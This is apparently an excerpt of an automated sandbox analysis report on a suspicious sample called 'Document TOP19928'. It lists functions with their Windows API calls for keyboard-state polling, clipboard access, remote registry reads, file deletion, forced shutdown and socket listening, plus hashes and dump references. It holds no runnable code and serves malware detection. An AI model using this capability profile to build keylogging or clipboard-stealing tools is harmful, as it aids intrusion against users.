Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
Instruction ID: 2eb29490fe1d257eca01896f7c56e20381a71b2fba35c28739f951c1b5382aae
Opcode Fuzzy Hash: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
Instruction Fuzzy Hash: 08615771901219EFDF00DFA4EC88AEEBBB9FF04701F188129E915E7291DB359A45CB60

Function 007E6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 008216FA
BSR_ANYCRLF), xrefs: 00821757
Oa~, xrefs: 00821888, 0082192F, 008219DD
UTF), xrefs: 00821533
NO_AUTO_POSSESS), xrefs: 00821567
LIMIT_MATCH=, xrefs: 008215A9
NO_START_OPT), xrefs: 00821588
LIMIT_RECURSION=, xrefs: 00821635
ANYCRLF), xrefs: 00821734
UTF16), xrefs: 00821508
UCP), xrefs: 00821546
BSR_UNICODE), xrefs: 00821771
LF), xrefs: 008216DD
ANY), xrefs: 00821717
CR), xrefs: 008216C0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa~$UCP)$UTF)$UTF16)
API String ID: 0-1095596525
Opcode ID: 4b1daa46c748f47c81b1a99ba2e5878df8b6de507bac715d5576e1d0374cf12e
Instruction ID: 9af42249cf9b07a2c15ecea094559f2a9435fd32f6a67f42b493ce1d0f3e60af
Opcode Fuzzy Hash: 4b1daa46c748f47c81b1a99ba2e5878df8b6de507bac715d5576e1d0374cf12e
Instruction Fuzzy Hash: 7272B571E01269DBDF14CF59D8847AEB7B5FF68310F24816AE909EB284E7349D81CB90

Function 00850665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850737

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008507D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0085086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00850AAD
RegCloseKey.ADVAPI32(00000000), ref: 00850ABA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4d7df6ad5ee654477a40f670c8b4c498e43e2d68d4a8661148e13f3af533412f
Instruction ID: 0570f4e97f8ddce50617e3e1987f2271291c439749460ec79205938d707fd884
Opcode Fuzzy Hash: 4d7df6ad5ee654477a40f670c8b4c498e43e2d68d4a8661148e13f3af533412f
Instruction Fuzzy Hash: 0BE13C31204310AFCB14DF28C895E6ABBF5FF89714B04896DF94ADB2A2DB34E905CB51

Function 00830219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00830241
GetAsyncKeyState.USER32(000000A0), ref: 008302C2
GetKeyState.USER32(000000A0), ref: 008302DD
GetAsyncKeyState.USER32(000000A1), ref: 008302F7
GetKeyState.USER32(000000A1), ref: 0083030C
GetAsyncKeyState.USER32(00000011), ref: 00830324
GetKeyState.USER32(00000011), ref: 00830336
GetAsyncKeyState.USER32(00000012), ref: 0083034E
GetKeyState.USER32(00000012), ref: 00830360
GetAsyncKeyState.USER32(0000005B), ref: 00830378
GetKeyState.USER32(0000005B), ref: 0083038A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 564f985930e219ed3ae578cc917f336b8ec46cddf97b4f1338fca402dd666be4
Instruction ID: 2a2a8751fcecd9705ee3639156880f0303571dfd45390a974361f890a74e1bb6
Opcode Fuzzy Hash: 564f985930e219ed3ae578cc917f336b8ec46cddf97b4f1338fca402dd666be4
Instruction Fuzzy Hash: 284188645087C96EFF319B6488283A6BEA1FB91345F08419DD5C6C72C3E7D459C48FE2

Function 00844458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0084447F
EmptyClipboard.USER32 ref: 00844485
GlobalAlloc.KERNEL32(00000002,?), ref: 0084449A
CloseClipboard.USER32 ref: 00844539

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6e5d89d9d1a402ab325393b6c65f5f501bbda6f10c098929ce348ff4e62270c8
Instruction ID: e793e29bb01398b659be6a5ef1b0025670c465d1130ce46398bec042190f0f60
Opcode Fuzzy Hash: 6e5d89d9d1a402ab325393b6c65f5f501bbda6f10c098929ce348ff4e62270c8
Instruction Fuzzy Hash: B921B235201224DFDB10AF64EC09B6E7BA8FF54715F10802AFA06DB2B2DB38AC00CB55

Function 00833A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

Part of subcall function 00834CD3: GetFileAttributesW.KERNEL32(?,00833947), ref: 00834CD4

FindFirstFileW.KERNEL32(?,?), ref: 00833ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00833B87
MoveFileW.KERNEL32(?,?), ref: 00833B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00833BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00833BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00833BF5

Strings

\*.*, xrefs: 00833A8A, 00833A93, 00833AA8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 71bd014e1b756462ffc327024a35db892428ce2d43eb99ab8a0c92f1299f37d9
Instruction ID: 3b456125218a2a1706aef57145e5b9effdb37e8a896ea6e9b823855559b3a05e
Opcode Fuzzy Hash: 71bd014e1b756462ffc327024a35db892428ce2d43eb99ab8a0c92f1299f37d9
Instruction Fuzzy Hash: 21518E3180525D9BCF15EBA0CE969EDB778BF54310F24416AE442B7192EF346F09CBA1

Function 007E4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

Oa~, xrefs: 007E4984, 00818173
VUUU, xrefs: 00817B0C
VUUU, xrefs: 007E4520
ERCP, xrefs: 007E421F
VUUU, xrefs: 007E44ED
VUUU, xrefs: 007E44DB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID: ERCP$Oa~$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3237024780
Opcode ID: 9035f90117577ce41e872e0c49684b18bc65b858679c5acc4684ec86fc3dcf00
Instruction ID: 12fb568e9303452455ecd48f6454bb201118fce5d7eefd28d3cbb04caf47bf41
Opcode Fuzzy Hash: 9035f90117577ce41e872e0c49684b18bc65b858679c5acc4684ec86fc3dcf00
Instruction Fuzzy Hash: ADA26C70A0529ACBDF24CF59C9447EEB7B5FF58314F2481A9D856A7280E7389EC1CB80

Function 0083F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0083F6AB
Sleep.KERNEL32(0000000A), ref: 0083F6DB
_wcscmp.LIBCMT ref: 0083F6EF
_wcscmp.LIBCMT ref: 0083F70A
FindNextFileW.KERNEL32(?,?), ref: 0083F7A8
FindClose.KERNEL32(00000000), ref: 0083F7BE

Strings

*.*, xrefs: 0083F690

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 70698c9749dcbd27bffe78dc8402c26c187c751eef6a9a2ebf215d4bfdbb3ee0
Instruction ID: 3e886fc7adc8e685dbea854a818f9145c1a667ba062eb74d806ef2d29580b05d
Opcode Fuzzy Hash: 70698c9749dcbd27bffe78dc8402c26c187c751eef6a9a2ebf215d4bfdbb3ee0
Instruction Fuzzy Hash: BE418E71D0021A9BDF15EF64CC89AEEBBB4FF45310F144566E914E22A2EB349E44CBD0

Function 0085D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetSystemMetrics.USER32(0000000F), ref: 0085D78A
GetSystemMetrics.USER32(0000000F), ref: 0085D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0085D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0085DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0085DA24
ShowWindow.USER32(00000003,00000000), ref: 0085DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0085DA68
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0085DA8B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID:
API String ID: 830902736-0
Opcode ID: f49fa516cd598059d2b9a5d93199b95f4fa4353815b93237441162cf8c547e9b
Instruction ID: 0fb0edd1413edb78b988a260b49571a3fedf58ed69104872edfd507b44da69d3
Opcode Fuzzy Hash: f49fa516cd598059d2b9a5d93199b95f4fa4353815b93237441162cf8c547e9b
Instruction Fuzzy Hash: 8CB17B75600225EFDF25CF68C9857AE7BB1FF48702F088069ED48DB296D734A958CB50

Function 007E58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E5A05
_memmove.LIBCMT ref: 007E5A55
_memmove.LIBCMT ref: 007E5ABB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d845e47702f62292f5d565b4e573e1dd558fe6a635a6d847512f999e764b64bb
Instruction ID: b336ca2fca5ba246783f7dada2e7031caa9e530811bfe921c94ba66a54defc25
Opcode Fuzzy Hash: d845e47702f62292f5d565b4e573e1dd558fe6a635a6d847512f999e764b64bb
Instruction Fuzzy Hash: 63128970A0061DDFDF14DFA5D985AAEB7B5FF48304F108229E406E7292EB3AAD51CB50

Function 007E5680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

_memmove.LIBCMT ref: 0082062F
_memmove.LIBCMT ref: 00820744
_memmove.LIBCMT ref: 008207EB

Strings

yZ~, xrefs: 00820881, 008207FF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ~
API String ID: 1300846289-1401447208
Opcode ID: c9f02935108d8a4f820232a41d2bbf2fe7941d3ede1dd3973bc0b356c06ed063
Instruction ID: 3998c1d6064850215da7945e7c0f0ca948a61a985cf7df2d0ed84fbb1ea34518
Opcode Fuzzy Hash: c9f02935108d8a4f820232a41d2bbf2fe7941d3ede1dd3973bc0b356c06ed063
Instruction Fuzzy Hash: 54029FB0A00219DFCF04DF69E985AAE7BB5FF48304F148069E806DB356EB35D950CB91

Function 0085C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

ReleaseCapture.USER32 ref: 0085C2F0
SetWindowTextW.USER32(?,00000000), ref: 0085C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0085C3AD
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0085C48F

Strings

@GUI_DRAGFILE, xrefs: 0085C424
@GUI_DROPID, xrefs: 0085C3E1

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 7b1e54ed0c9113b166f65e947dfb55e148b05db19c6d4a6e789f2923217446a2
Instruction ID: cbc27a616150337427f2a77acb1dbd19549a4bbe3fa5bf8b971c5ea28f4a7faf
Opcode Fuzzy Hash: 7b1e54ed0c9113b166f65e947dfb55e148b05db19c6d4a6e789f2923217446a2
Instruction Fuzzy Hash: AA519E70204304EFDB04EF24C859F6A7BF5FB88311F04852AF991972E2DB74A959CB52

Function 0083545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00828CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00828D0D
Part of subcall function 00828CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828D3A
Part of subcall function 00828CC3: GetLastError.KERNEL32 ref: 00828D47

ExitWindowsEx.USER32(?,00000000), ref: 0083549B

Strings

SeShutdownPrivilege, xrefs: 0083546B
@, xrefs: 0083548E
, xrefs: 00835489

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1d88f3c8cc0be7140ab8c414a4ee330ee64da5a7330474e8c93ef03ba72ca01f
Instruction ID: 0146fb459d0ac05815daccb8a0c7c888699e9a3eb1b43b7d0079e82945a7efe4
Opcode Fuzzy Hash: 1d88f3c8cc0be7140ab8c414a4ee330ee64da5a7330474e8c93ef03ba72ca01f
Instruction Fuzzy Hash: 5101F7B1655B156AEB2C6678EC4ABBA7298FB84353F240131FD07D20D3EA955C8082D9

Function 007E3190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa~, xrefs: 007E3482

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa~
API String ID: 674341424-1339823410
Opcode ID: 0045b6fe1a239ab41196bce512c15da7f4974a9adf47272fdeeed317f0d23502
Instruction ID: 5f0cfd22773c2256501d60ef48f1c0f02639516cbcc2c07ef84e56426c963bfa
Opcode Fuzzy Hash: 0045b6fe1a239ab41196bce512c15da7f4974a9adf47272fdeeed317f0d23502
Instruction Fuzzy Hash: 1E2279715083819FC724DF25C885BAAB7E8FF88314F10492DF59697391DB78EA44CB92

Function 00846596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 008465EF
WSAGetLastError.WS2_32(00000000), ref: 008465FE
bind.WS2_32(00000000,?,00000010), ref: 0084661A
listen.WS2_32(00000000,00000005), ref: 00846629
WSAGetLastError.WS2_32(00000000), ref: 00846643
closesocket.WS2_32(00000000), ref: 00846657

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 86d3baa1da3446d241b269229a49437c818e5e22983502e5ef32e950ee0ce8e6
Instruction ID: a919202654f409cb6889dcd821bf8609770a63882dea29ca0025ce353ded037f
Opcode Fuzzy Hash: 86d3baa1da3446d241b269229a49437c818e5e22983502e5ef32e950ee0ce8e6
Instruction Fuzzy Hash: A621C3312002189FCB00AF24D849B6EB7B9FF49311F15816AEA56E73D2DB34AD10CB51

